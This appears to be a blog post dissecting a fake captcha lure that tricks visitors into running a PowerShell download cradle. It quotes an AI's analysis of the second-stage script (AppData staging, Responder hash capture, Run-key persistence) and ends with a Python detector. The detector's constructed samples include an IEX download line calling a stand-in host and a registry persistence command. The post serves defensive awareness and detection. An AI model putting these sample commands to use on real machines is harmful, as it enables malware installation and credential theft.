???????????????? - Verify Captcha and Got Free Computer Virus (How It Works)

After hours of studying and doing some personal tasks over the weekend, I grabbed the keyboard to visit a movie website. As soon as the new page loaded, it popped up a message asking me to "Verify Captcha" in order to proceed. The instructions first asked the user to press the Win+R keyboard shortcut, which opens the Windows Run dialog. Second, they asked the user to press Ctrl+V, which pastes the clipboard contents that the website had already placed there.

A bit strange, right? Why would a captcha verification require pasting or dropping something onto the local computer? Let's look at what is inside the clipboard. It is just text, but it is not innocent text: it is a Windows PowerShell one-liner that downloads a file from another remote server host. Cool!

Interestingly, part of it is encoded text that looked like base64, so I decoded it and found more PowerShell commands along with the URL of the remote host that serves the juicy file to visitors. I couldn't wait, so I followed the link and my browser downloaded the file immediately (in my case it was named GqHQWNMv.txt). My system is Linux and the suspicious file is designed for Windows, so I hope it does not affect my system.

Once the download completed, I opened it in a text editor and found that it was another PowerShell script which, according to a ChatGPT analysis, performs the following actions.

Full text of the ChatGPT analysis:

"The uploaded file appears to be a screenshot of a script written in PowerShell. Based on its structure and some of the code's keywords, it may indeed be part of a malicious payload. Let me break it down for you and analyze what it's doing:"

Key Observations:

  1. Environment Variables: Set-Location $env:AppData is setting the working directory to the current user's AppData folder, a common location for malware to hide its activities.
  2. Base64-Encoded String: The variable $FrbgJhKI contains a long Base64 string, likely representing an embedded payload (possibly a malicious binary or script).
  3. Decoding and Writing to Disk: [System.Convert]::FromBase64String is decoding the Base64 string. [System.IO.File]::WriteAllBytes writes the decoded content to disk.
  4. Creating a Directory: A directory is created using $QvRhSlfu.
  5. Executing Responder: The variable $BMFSQWR contains the path to Responder.exe, a tool used for network-based attacks (e.g., capturing NTLM hashes).
  6. Persistence Mechanism: Modifications to the Windows registry (HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run) add persistence by making the malicious file run at startup.
  7. Cleanup: The script removes temporary files to cover its tracks.


To summarize, always stay vigilant and browse with caution. Reckless browsing and unsafe practices can expose you to serious risks, including malware and data theft.
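As an added example (not code from the original post), here is a small Python detector for the pattern described above: it decodes a PowerShell -EncodedCommand argument and checks a process command line, or a value read from the Win+R history key HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, for the download-cradle, AppData and Run-key indicators the analysis lists. The hostname example.invalid, the indicator names and the three sample command lines are constructed for this example.

```python
import base64
import re
from typing import Optional

# Indicator name -> regex. One per stage the post describes: a hidden, policy-bypassing
# PowerShell launched from Win+R, an encoded download cradle, base64 payload decoding,
# working from %AppData% and HKCU Run-key persistence.
INDICATORS = {
    "hidden_window": r"-w(?:indowstyle)?\s+hidden",
    "exec_policy_bypass": r"-e(?:xecutionpolicy|p)\s+bypass",
    "webclient": r"Net\.WebClient",
    "download": r"Download(?:String|File)|Invoke-WebRequest|\biwr\b",
    "iex": r"Invoke-Expression|\biex\b",
    "b64_decode": r"FromBase64String",
    "appdata_cwd": r"Set-Location\s+\$env:AppData",
    "run_key": r"CurrentVersion\\Run(?:Once)?\b",
}
ENC_ARG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # malformed blob: the raw line is still matched below

def analyze(cmdline: str) -> dict:
    """Score one process command line (or a RunMRU value) against INDICATORS."""
    decoded = decode_encoded_command(cmdline)
    # Match against the line with the opaque base64 blob removed plus its decoded form,
    # so the blob itself cannot produce accidental hits.
    text = ENC_ARG.sub(" ", cmdline) + (" " + decoded if decoded else "")
    hits = sorted(n for n, rx in INDICATORS.items() if re.search(rx, text, re.IGNORECASE))
    return {"decoded": decoded, "indicators": hits, "suspicious": len(hits) >= 2}

# Constructed samples (no real infrastructure): an admin command, a lure-style one-liner
# like the one the fake captcha asks the victim to paste, and a second-stage persistence step.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/GqHQWNMv.txt')"
SAMPLE_LINES = [
    'powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"',
    "powershell.exe -w hidden -ep bypass -enc "
    + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode(),
    'powershell.exe -Command "Set-Location $env:AppData; Set-ItemProperty '
    'HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run -Name Updater -Value $BMFSQWR"',
]
```

Feed `analyze()` the command lines from process-creation events (Sysmon event ID 1 or Windows Security event 4688) or the RunMRU values of a user hive; a single hit such as Invoke-WebRequest is common in admin scripts, which is why two or more indicators are required before a line is marked suspicious.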
